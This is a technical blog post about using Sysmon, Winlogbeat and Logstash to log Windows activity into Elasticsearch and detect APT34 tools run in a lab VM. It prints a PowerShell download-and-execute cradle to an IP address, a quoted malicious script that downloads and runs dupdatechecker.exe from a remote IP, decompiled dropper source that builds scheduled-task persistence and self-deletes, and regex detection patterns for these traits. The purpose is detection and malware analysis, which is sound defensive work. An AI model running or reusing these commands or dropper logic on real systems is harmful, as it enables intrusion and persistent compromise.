APT

Summary

The previous post, Monitoring for Windows Event Logs and the Untold Story of proper ELK Integration, explained how to monitor Windows Event Log records with Elasticsearch, Kibana, Winlogbeat and Logstash. That post provided a list of Windows Event Log records (grouped by functionality and Event ID) and explained in detail how to use Elastic’s Winlogbeat and Logstash products to ship these logs from any Windows Operating System (OS) to an Elasticsearch cluster and index them. It also showed how to use the filtering functionality of Logstash to normalize documents and extract metadata from them into new fields before indexing, and how to run Elasticsearch DSL queries to get documents of interest back from Elasticsearch. If you haven’t read that post, I suggest you read it before going through this one. This post focuses on the monitoring functionality and won’t repeat things that should be obvious to you by now if you read the previous post, so keep that in mind as you go through it.

This blog post will explain how to use the Microsoft Sysinternals System Monitor (Sysmon) tool to gather additional metadata about activity occurring on any Windows system, and show you how to turn that activity into Windows Event Log records through a custom configuration. In addition, it will show you how to ship these logs with Elastic Winlogbeat from your Windows OS and how to use Logstash to extract metadata from them into fields that might be of interest to you. This post will provide some filters and explain how you can use them to enhance your monitoring process and get better visibility. Finally, it will include real-world examples of monitoring malware activity, taken from FireEye’s APT34 blog post.

Assumption – Expectations – Credits

Before reading any further, I assume that you are a seasoned Elasticsearch programmer and have the essential skill-set to index documents, create graphs in Kibana, use Elasticsearch DSL scripts and so on. I also assume that you have a fundamental understanding of information security and that you understand the meaning of Windows Event Log records and their importance. If so, you should be good to go; just keep reading this post. As you will see, this blog post is broken into part I and part II.

Part I will explain how to leverage Sysmon, provide an explanation of Windows Event Log records and provide a list of interesting records (based on their Event ID) you may want to monitor. Part I will also show you how to ship these Windows Event Log records from any Windows OS to a Logstash instance in your Elasticsearch cluster. The intention behind part I is not to present Windows Event Log records as if they never existed before. Rather, it will show you how to fuse Windows Event Logs generated by Sysmon with Elasticsearch.

Part II, on the other hand, focuses on monitoring and detecting malware associated with APT34. On December 7, 2017, FireEye published the blog post Targeted attack in middle east by APT34 (APT stands for Advanced Persistent Threat). Part II will show you how to monitor for activity on a Windows system that is compromised with malware variants seen used by APT34. It will also explain some of the technical aspects of the malware (even though the scope of this blog post is not malware analysis) and show you what type of information you could find in your Elasticsearch index. The credit for APT34 and the malware variants used in this blog post goes directly to FireEye.

The very last section, References and Credits, lists more online resources and material I have used in this blog post. You may want to check them out as well. I (Yakov Goldberg) prepared this blog post to share some of my experience and knowledge in the field. I truly believe that sharing is caring, so I hope you find this information useful.

Part I – Sysmon Events, Elasticsearch Integration & Document Tuning

Sysinternal Sysmon

According to Microsoft, “System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.” From my experience, one of the nicest things about Sysmon is that it collects artifacts and additional metadata about activities occurring on the Windows OS. These artifacts and metadata are then stored as Windows Event Log records in the Sysmon event log.

Side Note: Once stored as Windows Event Log records on the system, these logs can then be shipped to an Elasticsearch cluster using Winlogbeat as the sender and Logstash as the receiver. If you don’t know what Winlogbeat and Logstash are, I highly suggest that you read about them before going any further. Alternatively, read my previous blog post to learn more about them.

Sysmon is free and pretty easy to download and install, and it runs as a service in the background on any Windows OS. Simply download Sysmon from https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon. Once you have downloaded the tool to your system, run one of the following commands (32-bit or 64-bit build) to install it with the default configuration:

Sysmon.exe -accepteula -i -l -n
Sysmon64.exe -accepteula -i -l -n

The flags associated with this execution are:

  • -l: Log loading of modules. Optionally takes a list of processes to track.
  • -i: Install service and driver. Optionally takes a configuration file.
  • -n: Log network connections. Optionally takes a list of processes to track.

You can view the configuration by simply typing the following command: Sysmon -c

At this point, you should be able to see all Windows Event Log records created through Sysmon in Windows Event Viewer under Application and Services Logs/Microsoft/Windows/Sysmon/Operational (on earlier Windows OS versions, Sysmon stores these logs under the Windows System log). Once the Sysmon service is running, it will start collecting artifacts and generating Windows Event Log records. The following table contains the Windows Event Logs created by default when Sysmon runs as a service:

Event ID Log Type Description
1 Microsoft-Windows-Sysmon/Operational Process Creation
2 Microsoft-Windows-Sysmon/Operational A process changed a file creation time
3 Microsoft-Windows-Sysmon/Operational Network Connection
4 Microsoft-Windows-Sysmon/Operational Sysmon service state changed
5 Microsoft-Windows-Sysmon/Operational Process terminated
6 Microsoft-Windows-Sysmon/Operational Driver loaded
7 Microsoft-Windows-Sysmon/Operational Image loaded
8 Microsoft-Windows-Sysmon/Operational CreateRemoteThread
9 Microsoft-Windows-Sysmon/Operational RawAccessRead
10 Microsoft-Windows-Sysmon/Operational ProcessAccess
11 Microsoft-Windows-Sysmon/Operational FileCreate
12 Microsoft-Windows-Sysmon/Operational RegistryEvent (Object create and delete)

 

One of the coolest things available with Sysmon is its ability to hash the image file associated with a process execution. When a process of interest executes on the system, Sysmon attempts to calculate the hash value of the file backing that process. Sysmon can calculate the MD5, SHA1, SHA256 and IMPHASH values of that file, as shown in the figure below (look at the Hashes: line):

Sysmon Event ID 1 hashes

Furthermore, Sysmon also lets you write a configuration file that controls which activities on the system generate Windows Event Log records. For example, you can tell Sysmon to monitor activity related to WMI command execution by watching for the process wmiprvse.exe. The configuration file format is XML, so it is fairly easy to customize on your own. If you don’t feel like customizing the XML yourself, a set of ready-made Sysmon configuration files can be downloaded from the GitHub resource sysmon configs. Once you have downloaded a configuration file, apply it with the -c flag as shown in the example below:

Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T0000_wmic_remote.xml -l -n 
Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T1138_appcompat.xml -l -n

Here is another example of a configuration file:

<Sysmon schemaversion="3.4">
  <!-- Capture all hashes -->
  <HashAlgorithms>*</HashAlgorithms>
  <EventFiltering>
    <!-- Event ID 1 == Process Creation. -->
    <ProcessCreate onmatch="include">
      <ParentImage condition="end with">wmiprvse.exe</ParentImage>
      <ParentImage condition="contains">cmd.exe</ParentImage>
      <ParentImage condition="contains">wscript.exe</ParentImage>
      <ParentImage condition="contains">svchost.exe</ParentImage>
      <ParentImage condition="contains">powershell.exe</ParentImage>
      <ParentImage condition="contains">mshta.exe</ParentImage>
      <ParentImage condition="contains">office</ParentImage>
      <Image condition="end with">cscript.exe</Image>
      <Image condition="end with">wscript.exe</Image>
      <Image condition="end with">cmd.exe</Image>
      <Image condition="end with">powershell.exe</Image>
      <Image condition="end with">sh.exe</Image>
      <Image condition="end with">bash.exe</Image>
      <Image condition="end with">scrcons.exe</Image>
      <Image condition="end with">regsvr32.exe</Image>
      <Image condition="end with">hh.exe</Image>
    </ProcessCreate>
    <!-- Event ID 2 == File Creation Time. -->
    <FileCreateTime onmatch="include"/>
    <!-- Event ID 3 == Network Connection. -->
    <NetworkConnect onmatch="include"/>
    <!-- Event ID 5 == Process Terminated. -->
    <ProcessTerminate onmatch="include"/>
    <!-- Event ID 6 == Driver Loaded. -->
    <DriverLoad onmatch="include"/>
    <!-- Event ID 7 == Image Loaded. -->
    <ImageLoad onmatch="include"/>
    <!-- Event ID 8 == CreateRemoteThread. -->
    <CreateRemoteThread onmatch="include"/>
    <!-- Event ID 9 == RawAccessRead. -->
    <RawAccessRead onmatch="include"/>
    <!-- Event ID 10 == ProcessAccess. -->
    <ProcessAccess onmatch="include"/>
    <!-- Event ID 11 == FileCreate. -->
    <FileCreate onmatch="include"/>
    <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
    <RegistryEvent onmatch="include"/>
    <!-- Event ID 15 == FileStream Created. -->
    <FileCreateStreamHash onmatch="include"/>
    <!-- Event ID 17,18 == PipeEvent. Log Named pipe created & Named pipe connected -->
    <PipeEvent onmatch="include"/>
    <!-- Event ID 19,20,21 == WmiEvent. Log all WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter activity -->
    <WmiEvent onmatch="include"/>
  </EventFiltering>
</Sysmon>

As you can see in the example above, the * (asterisk) in the HashAlgorithms XML tag simply tells Sysmon to calculate all possible hashes of an executed process image (i.e. MD5, SHA1, SHA256 and IMPHASH). When you get to the Logstash configuration section, you will see how to split these hashes into their own fields and how to create tables for each field in Kibana. Under the ProcessCreate section you can set triggers for process names, including parent-child process relationships, conditions for each trigger and so on. Sysmon also allows you to generate other events for network connections, driver loads and the list goes on and on. I would suggest that you read about Sysmon in other online resources so you can master Sysmon to its full capabilities. Some of these resources are mentioned in the reference section at the end of this post.

Winlogbeat Configuration

If you read the previous blog post, then you should know by now what Winlogbeat from Elastic is and how to configure it to ship Windows Event Log records to Logstash. In order to send Sysmon Windows Event Log records to Logstash for processing, you must first add the Sysmon log to the Winlogbeat configuration file (winlogbeat.yml). Simply add the following to your winlogbeat.yml file:

winlogbeat.event_logs:
  - name: Microsoft-Windows-Sysmon/Operational
    fields:
      log_type: windowsevt

Side Note: You can always run the following PowerShell command to see which Windows Event Logs (by name) are available to add to the Winlogbeat configuration file:

Get-WinEvent -ListLog * | Format-List -Property LogName

That is it for the configuration portion of Winlogbeat. Of course, if you have not read the previous blog post, then you will also need to configure in Winlogbeat the target IP address and port of the server you are running Logstash on.

Logstash Configuration

If you had a chance to read the previous blog post, then you should know by now how to filter and normalize documents received from Winlogbeat using Logstash. I assume at this point that you have such filtering in place and have been able to successfully filter Windows Event Log records using Winlogbeat and Logstash and index them properly. As mentioned, one of the great things Sysmon does is calculate the hash value of a running process image. By default Sysmon only calculates one hash value. However, as you saw in the Sysmon section, adding the * (asterisk) to the HashAlgorithms XML tag tells Sysmon to calculate all possible hashes of an executed process (i.e. MD5, SHA1, SHA256 and IMPHASH). If that is the case, then you should consider adding the following filters to your Logstash configuration file:

# Split each Sysmon hash into its own field. These filters assume that an
# earlier filter has already split the combined Hashes string
# ("SHA1=...,MD5=...,SHA256=...,IMPHASH=...") on "," into the alt* fields below.

# split sha1 hash and sanitize to fields
if ([event_data][hashes][altsha1]) {
   mutate {
      # "SHA1=<value>" -> ["SHA1", "<value>"]
      split => ["[event_data][hashes][altsha1]", "="]
      # keep only the value (index 1) in a clean field, then drop the raw one
      add_field => { "[event_data][hashes][sha1]" => "%{[event_data][hashes][altsha1][1]}" }
      remove_field => [ "[event_data][hashes][altsha1]" ]
   }
}

# split md5 hash and sanitize to fields
if ([event_data][hashes][altmd5]) {
   mutate {
      split => ["[event_data][hashes][altmd5]", "="]
      add_field => { "[event_data][hashes][md5]" => "%{[event_data][hashes][altmd5][1]}" }
      remove_field => [ "[event_data][hashes][altmd5]" ]
   }
}

# split sha256 hash and sanitize to fields
if ([event_data][hashes][altsha256]) {
   mutate {
      split => ["[event_data][hashes][altsha256]", "="]
      add_field => { "[event_data][hashes][sha256]" => "%{[event_data][hashes][altsha256][1]}" }
      remove_field => [ "[event_data][hashes][altsha256]" ]
   }
}

# split imphash hash and sanitize to fields
if ([event_data][hashes][altimphash]) {
   mutate {
      split => ["[event_data][hashes][altimphash]", "="]
      add_field => { "[event_data][hashes][imphash]" => "%{[event_data][hashes][altimphash][1]}" }
      remove_field => [ "[event_data][hashes][altimphash]" ]
   }
}

Essentially, these filters split the [event_data][hashes] field in your JSON document from one field that contains all hashes together and looks like this:

event_data.hashes

into separate fields, one per hash value, as shown below:

hash fields

Now that each hash value is in its own field, you can stack them for frequency analysis in Kibana by creating a table visualization. If you did it successfully, your table should look similar to the following:

MD5 Stacking
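As an added example (not code from the post, Sysmon or Logstash), the following Python does the same job as the mutate filters above and then the stacking, over constructed Event ID 1 records: it splits Sysmon’s combined Hashes string into one field per algorithm, flags values that are not well-formed hex, and counts occurrences the way the Kibana table does. The [event_data][hashes][md5] layout mirrors the post; the sample records and helper names are my own.

```python
import copy
from collections import Counter
from typing import Any, Dict, List, Tuple

# Hash algorithms Sysmon emits when <HashAlgorithms>*</HashAlgorithms> is set,
# with the number of hex characters each value should have.
EXPECTED_HEX_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "imphash": 32}


def split_hashes(hashes: str) -> Dict[str, str]:
    """Parse Sysmon's 'SHA1=..,MD5=..,SHA256=..,IMPHASH=..' string into a dict.

    Tolerates any ordering, a subset of algorithms (Sysmon's default config
    emits a single hash), stray whitespace and an empty string.  Values are
    lower-cased so the same file always lands in one row when stacked.
    """
    fields: Dict[str, str] = {}
    for part in hashes.split(","):
        algo, sep, value = part.partition("=")
        algo, value = algo.strip().lower(), value.strip().lower()
        if sep and algo and value:
            fields[algo] = value
    return fields


def malformed_hashes(fields: Dict[str, str]) -> List[str]:
    """Names of hash fields whose value is not hex of the expected length.

    A wrong-length or non-hex value usually means the upstream split went
    wrong, so it is worth surfacing before the document is indexed."""
    bad = []
    for algo, value in fields.items():
        expected = EXPECTED_HEX_LEN.get(algo)
        is_hex = all(c in "0123456789abcdef" for c in value)
        if expected is None or len(value) != expected or not is_hex:
            bad.append(algo)
    return bad


def normalize_event(event: Dict[str, Any]) -> Dict[str, Any]:
    """Replace event_data['Hashes'] with an event_data['hashes'] sub-document,
    the shape the Logstash mutate filters in the post produce.  Mutates and
    returns the event."""
    data = event.setdefault("event_data", {})
    raw = data.pop("Hashes", None)
    if raw is not None:
        data["hashes"] = split_hashes(raw)
    return event


def stack(events: List[Dict[str, Any]], algo: str) -> List[Tuple[str, int]]:
    """Frequency of each value of one hash field, most common first: the data
    behind a Kibana table that stacks, e.g., md5 across Event ID 1 records."""
    counts = Counter(
        e["event_data"]["hashes"][algo]
        for e in events
        if algo in e.get("event_data", {}).get("hashes", {})
    )
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed Sysmon Event ID 1 records (placeholder hashes, not real samples).
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"event_id": 1, "event_data": {"Image": "C:\\Windows\\System32\\cmd.exe",
     "Hashes": "SHA1=" + "a" * 40 + ",MD5=" + "b" * 32
               + ",SHA256=" + "c" * 64 + ",IMPHASH=" + "d" * 32}},
    {"event_id": 1, "event_data": {"Image": "C:\\Windows\\System32\\cmd.exe",
     "Hashes": "MD5=" + "b" * 32 + ",SHA1=" + "a" * 40}},   # different order
    {"event_id": 1, "event_data": {"Image": "C:\\Windows\\System32\\regsvr32.exe",
     "Hashes": "MD5=" + "e" * 32 + ",SHA256=" + "0" * 64}},
    {"event_id": 1, "event_data": {"Image": "C:\\Windows\\System32\\wscript.exe",
     "Hashes": "SHA1=" + "f" * 40}},                         # single-hash host
]


def normalized_samples() -> List[Dict[str, Any]]:
    """Deep-copy and normalize the constructed events."""
    return [normalize_event(copy.deepcopy(e)) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    events = normalized_samples()
    for value, count in stack(events, "md5"):
        print(f"{value}  {count}")
```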

Aside from splitting hashes into different fields, there is another filtering technique you can leverage while normalizing Windows Event Log records generated by Sysmon. Take for example the following PowerShell command:

powershell.exe -Command {IEX (New-Object Net.Webclient).DownloadString('http://93.163.123.173/evil.ps1')}

When this command executes on a system, it attempts to download the PowerShell script evil.ps1 from the remote IP address 93.163.123.173. During execution, Sysmon generates a new Event ID 1 record, and the message inside this event will look like the following:

event_id1_evil.ps1

In the figure above you can clearly see the command as part of the message under CommandLine. With that in mind, if you read my previous blog post, then you should be familiar with the Grok filter in Logstash. Grok filtering lets you create a filter that extracts the IP address and the PowerShell script file name from the message field and puts each of them in its own new field. To accomplish this, you will need to create and use the following Grok filter:

# extract the remote IP address and script file name from Event ID 1 messages
if ([event_id] == 1) {
   grok {
      match => { "message" => "http://%{IP:[remote_ip]}/%{GREEDYDATA:[event_data][powershell_file]}'" }
   }
}

If the filter worked properly, you should see new fields in the indexed document like those shown in the following figure:

IPAdd_Powershell_filter

As you can see in the figure above, there is a new field [event_data][powershell_file] that contains the filename evil.ps1 and another field [remote_ip] which contains the IP address. You can also see the Geographical (GEO) fields in the figure. These fields are also populated automatically through the Logstash filter if you configured it properly. If you don’t know how to get Logstash to populate the GEO fields from an IP address, then please read the previous blog post; it should give you an idea of how to achieve it. If the remote_ip field is populated properly through Logstash, then in Kibana you should be able to create a pie chart like the one shown in the following figure:

IP_Address_piechart

Side Note: I only tried the grok filter above on strings containing a combination of the http and an IP address in the string. In real life, you will need to create multiple Grok filters for other string variations (for example, https and domain instead of an IP address). The goal in this blog post is to give you an idea on how you can leverage Grok filter to extract additional metadata from the message field and then normalize this data into new fields. Use the example above to extract other metadata.
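The grok pattern above only matches http followed by an IP address. As an added example (not code from the post), here is the same extraction in Python generalized to https, host names and explicit ports, run over constructed command lines; the field names remote_ip, remote_domain, remote_port and remote_file are my choices for this example.

```python
import re
from typing import Any, Dict, Optional

# The URL inside a download cradle: scheme, host (IPv4 or DNS name), optional
# port, and a path whose last segment is the fetched file.  Constructed here as
# a generalization of the post's grok pattern
#   http://%{IP:[remote_ip]}/%{GREEDYDATA:[event_data][powershell_file]}'
# to also cover https, host names and non-default ports.
URL_RE = re.compile(
    r"(?P<scheme>https?)://(?P<host>[A-Za-z0-9.-]+)(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^\s'\"()<>]*)?",
    re.IGNORECASE,
)
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def extract_download(command_line: str) -> Optional[Dict[str, str]]:
    """Pull the remote endpoint and file name out of a PowerShell command line.

    Returns None when no http(s) URL is present.  The host goes into
    remote_ip or remote_domain depending on its form, so a GeoIP filter can be
    applied to the former and DNS-based enrichment to the latter."""
    m = URL_RE.search(command_line)
    if not m:
        return None
    scheme = m.group("scheme").lower()
    host = m.group("host").rstrip(".")
    path = m.group("path") or "/"
    out = {
        "scheme": scheme,
        "remote_port": m.group("port") or ("443" if scheme == "https" else "80"),
        "remote_path": path,
        "remote_file": path.rsplit("/", 1)[-1],  # '' when the URL ends in '/'
    }
    if IPV4_RE.match(host):
        out["remote_ip"] = host
    else:
        out["remote_domain"] = host.lower()
    return out


def enrich_event(event: Dict[str, Any]) -> Dict[str, Any]:
    """Mirror the Logstash grok step: add the extracted fields to event_data,
    but only for Event ID 1 (process creation) records."""
    if event.get("event_id") == 1:
        extracted = extract_download(event.get("event_data", {}).get("CommandLine", ""))
        if extracted:
            event.setdefault("event_data", {}).update(extracted)
    return event


# Constructed command lines: the first mirrors the post's example, the next
# two are the variations the side note says a single grok pattern will miss.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -Command {IEX (New-Object Net.Webclient).DownloadString('http://93.163.123.173/evil.ps1')}",
    "powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://updates.example.test:8443/stage/update.exe', 'c:/programdata/update.exe')",
    "powershell.exe -nop -c \"iex (iwr HTTP://cdn.example.test/)\"",
    "powershell.exe -Command Get-Date",
]

if __name__ == "__main__":
    for cl in SAMPLE_COMMAND_LINES:
        print(extract_download(cl))
```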

PART II – Monitoring APT34 Tools

As mentioned in the credits section, on December 7, 2017, FireEye published the blog post Targeted attack in middle east by APT34. If you want to know more about APT34, I suggest you read their blog post. Please note that this section does not provide any intelligence into APT34’s operations, nor does it associate this group with any country and so on. I am simply not an expert in this area and won’t claim to be one. That said, this section will show you how you can leverage Sysmon to monitor the activity of tools used by the threat actor APT34. In a nutshell, I downloaded APT34 tools from an online resource and then ran them in a controlled Windows VM monitored by Sysmon. All the events generated by Sysmon in this Windows VM were shipped to Elasticsearch via Winlogbeat and processed by Logstash (using the filters I mentioned in part I). This section provides technical analysis of each tool and/or script used by APT34 that I was able to freely download and execute. In addition, it provides examples of what you could expect to see in Kibana, what indexed documents look like and so on.

PowerShell Downloader

File Characteristics

Filename: dupdatechecker.doc 
MD5 Hash: d85818e82a6e64ca185edfddba2d1b76

According to FireEye’s blog, the file dupdatechecker.doc is downloaded from a remote server when an .rtf file that attempts to exploit CVE-2017-0199 is executed. This file is not really a Word document; it simply contains the following data:

<script> 
//kasper detect this one
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://94.23.172.164/dupdatechecker.exe\', \'c:/programdata/dupdatechecker.exe\'); c:/programdata/dupdatechecker.exe', 0);window.close();
</script>

The script inside this file shows that, on execution, it runs a PowerShell command that attempts to download another file from the same remote IP address. The URL appears in the DownloadFile call and looks like this: hXXp://94.23.172.164/dupdatechecker.exe. Assuming the script was run on a system monitored with Sysmon and PowerShell logging (refer to my previous blog post to learn how to configure PowerShell monitoring), you should expect to see the execution of that PowerShell command in the following Windows Event Log records:

Event ID Log Type Description
600 Windows PowerShell Provider “Variable” is Started
800 Windows PowerShell Pipeline execution details for command line
400 Windows PowerShell Engine state is changed from None to Available
4103 Windows PowerShell Module logging events
1 Microsoft-Windows-Sysmon/Operational Process Creation

 

When these Windows Event Log records are indexed to Elasticsearch, you should be able to see a document like the one shown in the following figure:

sysmon_eventid1_dupdatechecker_doc

Please note that in the figure above you also see the IP address in its own field [geoip][ip], along with the GEO coordinates and the country associated with this IP address. Once again, this is possible through the filtering process in Logstash (as mentioned in the Logstash section). If you configured Logstash to geolocate fields containing IP addresses properly, then you should get the GEO coordinates and country fields as well. Alright, let’s check what this dupdatechecker.exe file is and what it does when it executes on the system.

Trojan Dropper

File Characteristics  

Filename:     dupdatechecker.exe
File size:    32768 bytes
MD5 Hash:     c9f16f0be8c77f0170b9b6ce876ed7fb
Compile Time: 2017-07-04 09:53:48

Nothing is unique about this binary executable besides the fact that it was developed in Microsoft .NET and compiled to a Portable Executable (PE) file. One way to tell is to search for this file (by its MD5 hash value c9f16f0be8c77f0170b9b6ce876ed7fb) in VirusTotal. Under the Details section, you will see multiple sections, but two of them should give you an idea about the origin of the file: the first is called .NET details and the second is the PE imports section. The following figure shows these two sections:

.NET Variant Example

The .NET details section provides two unique GUIDs associated with this PE file. When working on a .NET project in Visual Studio, these two GUIDs are generated and are unique (well, somewhat unique, as you will see in the additional variants section below) to that project. Once the project is compiled to a PE file, these two GUIDs are associated with that file. In the PE imports section (the second section) you will see that this PE file only imports one DLL, mscoree.dll, and only one Windows API function from it, _CorExeMain. Importing _CorExeMain from mscoree.dll usually suggests that you are dealing with a PE file that was compiled from a .NET project. To validate that it is a .NET file, you can decompile it with a tool such as ILSpy (look in the reference section below to learn where to obtain the tool). In a nutshell, ILSpy decompiles the .NET bytecode back into source code resembling what existed before compilation. Once you have opened this PE file with ILSpy, you can simply browse through each folder in the tree until you get to the main() function, as shown in the following figure:

ILSpy Tree

And once you click on the main() function, you see the following code:

 // exeruner.Program
private static void Main(string[] args)
{
 string text = "C:\\ProgramData\\Windows\\Microsoft\\java";
 bool flag = !Directory.Exists(text);
 if (flag)
 {
 Directory.CreateDirectory(text);
 }
 string value = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";\r\n${global:$dns_ag} = \"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\";\r\n${global:$http_ag} = \"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\";\r\nfunction runByVBS\r\n{\r\n\tif (-not (Test-Path -Path ${global:$address1}))\r\n\t{md ${global:$address1}}\r\n\tif (Test-Path -Path ${global:$address1})\r\n\t{\r\n\t\t\"set Shell0 = CreateObject(`\"wscript.shell`\")`nShell0.run `\"powershell.exe -exec bypass -enc \" + ${global:$http_ag} + \"`\", 0, false`nset Shell1 = CreateObject(`\"wscript.shell`\")`nShell1.run `\"powershell.exe -exec bypass -enc \" + ${global:$dns_ag} + \"`\", 0, false\" | Out-File \"${global:$address1}\\GoogleUpdateTasks.vbs\"\r\n\t\tschtasks /create /F /sc minute /mo 1 /tn \"\\UpdateTasks\\JavaUpdatesTasksHosts\" /tr \"wscript /b \\`\"${global:$address1}\\GoogleUpdateTasks.vbs\\`\"\";\r\n\t\tschtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn \"\\UpdateTasks\\JavaUpdatesTasksHosts\" /tr \"wscript /b \\`\"${global:$address1}\\GoogleUpdateTasks.vbs\\`\"\";\r\n\t}\r\n}\r\nrunByVBS;\r\n\r\n\r\n ";
 using (StreamWriter streamWriter = new StreamWriter(text + "\\rUpdateChecker.ps1"))
 {
 streamWriter.Write(value);
 streamWriter.Close();
 }
 string arguments = string.Concat(new string[]
 {
 "/c powershell -exec bypass -window hidden -nologo -command ",
 text,
 "\\rUpdateChecker.ps1 & ping 127.0.0.1 -n 6 > nul & del ",
 text,
 "\\rUpdateChecker.ps1"
 });
 new Process
 {
 StartInfo = new ProcessStartInfo
 {
 WindowStyle = ProcessWindowStyle.Hidden,
 FileName = "cmd.exe",
 Arguments = arguments
 }
 }.Start();
}

As you read through the code, you will see that on execution this PE file drops the file rUpdateChecker.ps1 into the folder C:\ProgramData\Windows\Microsoft\java. And, if Sysmon successfully created an event for this activity, then you should also see that record in Elasticsearch as shown in the figure below:

dupdatechecker

As you can see in the [event_data][CommandLine] field, cmd.exe executed with the /c flag (run the command and then terminate) to launch PowerShell. The PowerShell command ran with several other flags; the last one, -command, is responsible for executing the following:

  • Running the script C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1
  • Pinging localhost (likely used as a delay before the script deletes itself, as you can see in the next bullet point)
  • Deleting the script C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1

Finally, by looking at the figure above you can also see that the parent process (in the [event_data][ParentImage] field) was the PE file dupdatechecker.exe. Alright, let’s determine the functionality of the PowerShell script rUpdateChecker.ps1. The command line execution for this script appears like this:

powershell -exec bypass -window hidden -nologo -command C:\ProgramData\Windows\Microsoft\java\rUpdateChecker.ps1
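As an added example (not code from the post or from FireEye), the following Python checks a Sysmon Event ID 1 record, as Winlogbeat ships it, for the traits just described: cmd.exe /c launching PowerShell with -exec bypass and a hidden window, a ping to localhost used as a delay, a script that is run and then deleted, and a parent executable under ProgramData. The sample records, trait names and verdict thresholds are constructed for this example.

```python
import re
from typing import Any, Dict, List

# Traits of the dropper's command line as walked through in the post.  The
# patterns are constructed for this example, not taken from Sysmon or FireEye.
CMD_C_RE = re.compile(r"(?:^|\s)/c\s", re.IGNORECASE)
EXEC_BYPASS_RE = re.compile(r"-(?:exec|ex|ep|executionpolicy)\s+bypass", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indow|indowstyle)?\s+hidden", re.IGNORECASE)
PING_DELAY_RE = re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+", re.IGNORECASE)
RUN_SCRIPT_RE = re.compile(r"-(?:command|c|file|f)\s+(\S+\.ps1)", re.IGNORECASE)
DEL_SCRIPT_RE = re.compile(r"\bdel\s+(\S+\.ps1)", re.IGNORECASE)


def dropper_traits(event: Dict[str, Any]) -> List[str]:
    """Return the names of the dropper traits present in one Sysmon Event ID 1
    record (fields as Winlogbeat ships them: Image, ParentImage, CommandLine)."""
    if event.get("event_id") != 1:
        return []
    data = event.get("event_data", {})
    cmd = data.get("CommandLine", "")
    image = data.get("Image", "").lower()
    parent = data.get("ParentImage", "").lower()
    traits: List[str] = []
    if image.endswith("cmd.exe") and CMD_C_RE.search(cmd) and "powershell" in cmd.lower():
        traits.append("cmd_c_powershell")       # cmd.exe /c powershell ...
    if EXEC_BYPASS_RE.search(cmd):
        traits.append("exec_bypass")            # -exec bypass
    if HIDDEN_RE.search(cmd):
        traits.append("hidden_window")          # -window hidden
    if PING_DELAY_RE.search(cmd):
        traits.append("ping_delay")             # ping 127.0.0.1 -n 6 > nul
    run, deleted = RUN_SCRIPT_RE.search(cmd), DEL_SCRIPT_RE.search(cmd)
    if run and deleted and run.group(1).lower() == deleted.group(1).lower():
        traits.append("self_deleting_script")   # runs X.ps1 then del X.ps1
    if "\\programdata\\" in parent:
        traits.append("parent_in_programdata")  # parent PE ran from ProgramData
    return traits


def verdict(traits: List[str]) -> str:
    """Collapse the trait list into a triage label.  The thresholds are a
    judgement call for this example; tune them against your own baseline."""
    if "self_deleting_script" in traits and len(traits) >= 4:
        return "high"
    if len(traits) >= 2:
        return "medium"
    return "low"


SCRIPT = "C:\\ProgramData\\Windows\\Microsoft\\java\\rUpdateChecker.ps1"
# Constructed Sysmon records.  The first reproduces the command line the post's
# decompiled dropper builds; the second is a benign admin one-liner.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"event_id": 1, "event_data": {
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\ProgramData\\dupdatechecker.exe",
        "CommandLine": ("cmd.exe /c powershell -exec bypass -window hidden -nologo "
                        f"-command {SCRIPT} & ping 127.0.0.1 -n 6 > nul & del {SCRIPT}")}},
    {"event_id": 1, "event_data": {
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd.exe /c powershell -command Get-Date"}},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        found = dropper_traits(ev)
        print(verdict(found), found)
```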

Trojan Dropper

Filename: rUpdateChecker.ps1
MD5 Hash: 06d537af8c43f65fc467781b01047e5c

The PowerShell script rUpdateChecker.ps1 contains the following data:

${global:$address1} = $env:ProgramData + "\Windows\Microsoft\java";
${global:$dns_ag} = "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";
